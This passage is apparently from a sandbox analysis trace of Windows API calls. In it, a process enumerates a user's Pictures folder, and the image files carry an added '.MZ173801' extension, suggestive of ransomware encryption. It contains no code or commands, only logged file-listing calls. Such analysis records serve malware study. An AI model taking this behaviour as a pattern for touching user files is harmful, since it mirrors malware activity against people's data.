lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.338] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b5f9d0, ftCreationTime.dwHighDateTime=0x1d5e6e7, ftLastAccessTime.dwLowDateTime=0x2d7fee90, ftLastAccessTime.dwHighDateTime=0x1d5ecf1, ftLastWriteTime.dwLowDateTime=0xa5f552d2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5259, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="aY06BCEf5o.gif.MZ173801", cAlternateFileName="AY06BC~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x163e7250, ftCreationTime.dwHighDateTime=0x1d5e649, ftLastAccessTime.dwLowDateTime=0xd0e42e40, ftLastAccessTime.dwHighDateTime=0x1d5e61e, ftLastWriteTime.dwLowDateTime=0xa5f7b605, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1426a, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="BDibx-.png.MZ173801", cAlternateFileName="BDIBX-~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8970a220, ftCreationTime.dwHighDateTime=0x1d5e3ba, ftLastAccessTime.dwLowDateTime=0x93b68ad0, ftLastAccessTime.dwHighDateTime=0x1d5e453, ftLastWriteTime.dwLowDateTime=0xa5fa1860, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x60f1, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="BXHxcreN0NZMlQbLh4Mv.jpg.MZ173801", cAlternateFileName="BXHXCR~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e75740, ftCreationTime.dwHighDateTime=0x1d5ebda, ftLastAccessTime.dwLowDateTime=0x2db4ab90, ftLastAccessTime.dwHighDateTime=0x1d5e68d, ftLastWriteTime.dwLowDateTime=0xa5fa1860, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x13b36, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="cPoUOQ7FRc3tfk.gif.MZ173801", cAlternateFileName="CPOUOQ~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33cfb4a0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0xda46e4e0, ftLastAccessTime.dwHighDateTime=0x1d5e6a1, ftLastWriteTime.dwLowDateTime=0xa65dd4e6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xbe41, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="DHkWFe3.jpg.MZ173801", cAlternateFileName="DHKWFE~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x366a1b00, ftCreationTime.dwHighDateTime=0x1d5e8ac, ftLastAccessTime.dwLowDateTime=0xb429fb70, ftLastAccessTime.dwHighDateTime=0x1d5f039, ftLastWriteTime.dwLowDateTime=0xa65dd4e6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5b74, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="dzGys1Cl.jpg.MZ173801", cAlternateFileName="DZGYS1~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a15ee0, ftCreationTime.dwHighDateTime=0x1d5ebde, ftLastAccessTime.dwLowDateTime=0xaaf36460, ftLastAccessTime.dwHighDateTime=0x1d5e954, ftLastWriteTime.dwLowDateTime=0xa6603acd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1613e, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="eT6BMD39LltKR7xUw6.jpg.MZ173801", cAlternateFileName="ET6BMD~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a14400, ftCreationTime.dwHighDateTime=0x1d5e534, ftLastAccessTime.dwLowDateTime=0xcb77fd90, ftLastAccessTime.dwHighDateTime=0x1d5e3d7, ftLastWriteTime.dwLowDateTime=0xa66c236d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x10498, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="fwT7xBA.jpg.MZ173801", cAlternateFileName="FWT7XB~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b501fb0, ftCreationTime.dwHighDateTime=0x1d5e732, ftLastAccessTime.dwLowDateTime=0x90c21f90, ftLastAccessTime.dwHighDateTime=0x1d5e7ac, ftLastWriteTime.dwLowDateTime=0xa675ad46, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xd774, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="IZVvQMMfV6LuTAy.bmp.MZ173801", cAlternateFileName="IZVVQM~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x609fcb60, ftCreationTime.dwHighDateTime=0x1d5f007, ftLastAccessTime.dwLowDateTime=0x690ef7d0, ftLastAccessTime.dwHighDateTime=0x1d5e274, ftLastWriteTime.dwLowDateTime=0xa675ad46, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xc56a, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="jt9dNiGSkN.gif.MZ173801", cAlternateFileName="JT9DNI~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54aa9310, ftCreationTime.dwHighDateTime=0x1d5ee10, ftLastAccessTime.dwLowDateTime=0xe9955bb0, ftLastAccessTime.dwHighDateTime=0x1d5e3f5, ftLastWriteTime.dwLowDateTime=0xa678114a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xf700, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="s1HnMB.png.MZ173801", cAlternateFileName="S1HNMB~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2a3c2f0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xa068be10, ftLastAccessTime.dwHighDateTime=0x1d5e859, ftLastWriteTime.dwLowDateTime=0xa6865de6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17fd9, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="XbxN-s5VyE.gif.MZ173801", cAlternateFileName="XBXN-S~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.339] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.339] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe05d01c0, ftCreationTime.dwHighDateTime=0x1d5e525, ftLastAccessTime.dwLowDateTime=0xaf2bf320, ftLastAccessTime.dwHighDateTime=0x1d5e621, ftLastWriteTime.dwLowDateTime=0xa688c00b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x15f93, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="XO1z23.bmp.MZ173801", cAlternateFileName="XO1Z23~1.MZ1")) returned 1 [0116.339] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.340] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.340] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aaef750, ftCreationTime.dwHighDateTime=0x1d5ecf6, ftLastAccessTime.dwLowDateTime=0x60901260, ftLastAccessTime.dwHighDateTime=0x1d5ed32, ftLastWriteTime.dwLowDateTime=0xa6970ec3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5e4d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="zY_vL.gif.MZ173801", cAlternateFileName="ZY_VLG~1.MZ1")) returned 1 [0116.340] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.340] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.340] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aaef750, ftCreationTime.dwHighDateTime=0x1d5ecf6, ftLastAccessTime.dwLowDateTime=0x60901260, ftLastAccessTime.dwHighDateTime=0x1d5ed32, ftLastWriteTime.dwLowDateTime=0xa6970ec3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5e4d, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="zY_vL.gif.MZ173801", cAlternateFileName="ZY_VLG~1.MZ1")) returned 0 [0116.340] GetLastError () returned 0x12 [0116.340] FindClose (in: hFindFile=0xa1bd58 | out: hFindFile=0xa1bd58) returned 1 [0116.340] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10bceec0, ftCreationTime.dwHighDateTime=0x1d5eee0, ftLastAccessTime.dwLowDateTime=0xa35b3250, ftLastAccessTime.dwHighDateTime=0x1d5ebf7, ftLastWriteTime.dwLowDateTime=0xa55cbe40, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x11b28, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="HzRoNmrPEEYbe.jpg.MZ173801", cAlternateFileName="HZRONM~1.MZ1")) returned 1 [0116.340] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.340] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.340] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf07a5200, ftCreationTime.dwHighDateTime=0x1d5e210, ftLastAccessTime.dwLowDateTime=0xc4a7a7f0, ftLastAccessTime.dwHighDateTime=0x1d5e741, ftLastWriteTime.dwLowDateTime=0xa55cbe40, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xe03b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="K4Pe6YIq.bmp.MZ173801", cAlternateFileName="K4PE6Y~1.MZ1")) returned 1 [0116.340] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.340] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.340] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88049900, ftCreationTime.dwHighDateTime=0x1d5ea9f, ftLastAccessTime.dwLowDateTime=0xef3a7c90, ftLastAccessTime.dwHighDateTime=0x1d5ec64, ftLastWriteTime.dwLowDateTime=0xa55f1faa, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1480f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="oA91dS68Kck7s8GQB.gif.MZ173801", cAlternateFileName="OA91DS~1.MZ1")) returned 1 [0116.340] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.340] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.340] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x320cf630, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0x1c3f2a00, ftLastAccessTime.dwHighDateTime=0x1d5e32e, ftLastWriteTime.dwLowDateTime=0xa5a4442f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x858c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="P9y3n H.jpg.MZ173801", cAlternateFileName="P9Y3NH~1.MZ1")) returned 1 [0116.340] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.340] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.340] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd2eb000, ftCreationTime.dwHighDateTime=0x1d5ee24, ftLastAccessTime.dwLowDateTime=0xf00ccfd0, ftLastAccessTime.dwHighDateTime=0x1d5e555, ftLastWriteTime.dwLowDateTime=0xa5a6a5eb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x443a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="QWOw3VER.gif.MZ173801", cAlternateFileName="QWOW3V~1.MZ1")) returned 1 [0116.340] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.340] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.340] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3904540, ftCreationTime.dwHighDateTime=0x1d5ed2c, ftLastAccessTime.dwLowDateTime=0xf92b7900, ftLastAccessTime.dwHighDateTime=0x1d5ef22, ftLastWriteTime.dwLowDateTime=0xa5a6a5eb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9c94, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="rx3V.png.MZ173801", cAlternateFileName="RX3VPN~1.MZ1")) returned 1 [0116.340] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.340] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.340] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0116.341] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.341] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.341] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1baf0 [0116.341] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0116.341] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0116.342] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0116.342] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.342] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0116.342] GetLastError () returned 0x12 [0116.342] FindClose (in: hFindFile=0xa1baf0 | out: hFindFile=0xa1baf0) returned 1 [0116.342] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1be00 [0116.342] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0116.342] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.342] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0116.342] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.342] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.342] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0116.342] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0116.342] GetLastError () returned 0x12 [0116.342] FindClose (in: hFindFile=0xa1be00 | out: hFindFile=0xa1be00) returned 1 [0116.342] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaac86010, ftCreationTime.dwHighDateTime=0x1d5e55f, ftLastAccessTime.dwLowDateTime=0x8c2a2480, ftLastAccessTime.dwHighDateTime=0x1d5e4c5, ftLastWriteTime.dwLowDateTime=0xa5a90a97, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x17f17, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="SFUO7aG.bmp.MZ173801", cAlternateFileName="SFUO7A~1.MZ1")) returned 1 [0116.342] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: 